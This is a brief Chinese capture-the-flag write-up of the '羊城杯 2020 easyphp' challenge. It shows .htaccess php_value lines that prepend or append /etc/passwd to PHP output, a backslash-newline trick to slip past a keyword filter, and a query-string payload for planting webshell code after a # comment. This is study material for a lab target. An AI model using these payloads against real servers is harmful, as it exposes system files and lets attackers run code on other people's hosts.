每日练习-[羊城杯 2020]easyphp

.htaccess文件包含的利用

文件名不能字母开头,文件内容也做了过滤。只解析index.php。都满足之后写入文件并且末尾添加He11,World

.htaccess配合触发文件包含

通过 php_value 来设置 auto_prepend_file或者 auto_append_file 配置选项包含一些敏感文件,同时在本目录或子目录中需要有可解析的 php 文件来触发
.htaccess 分别通过这两个配置选项来包含 /etc/passwd,并访问同目录下的 index.php文件

auto_prepend_file

php_value auto_prepend_file /etc/passwd

 

auto_append_file

php_value auto_append_file /etc/passwd

文件内容过滤了file但是fil\

e进行绕过最后#进行写马操作。#是.htaccess文件特别写入

\进行转义\nHello, world。末尾\nHello, world不符合.htaccess的写法

payload:

?filename=.htaccess&content=php_value auto_prepend_fil\
e .htaccess
#\

最好进行url编码下.

你可能感兴趣的:(android,android,studio,ide)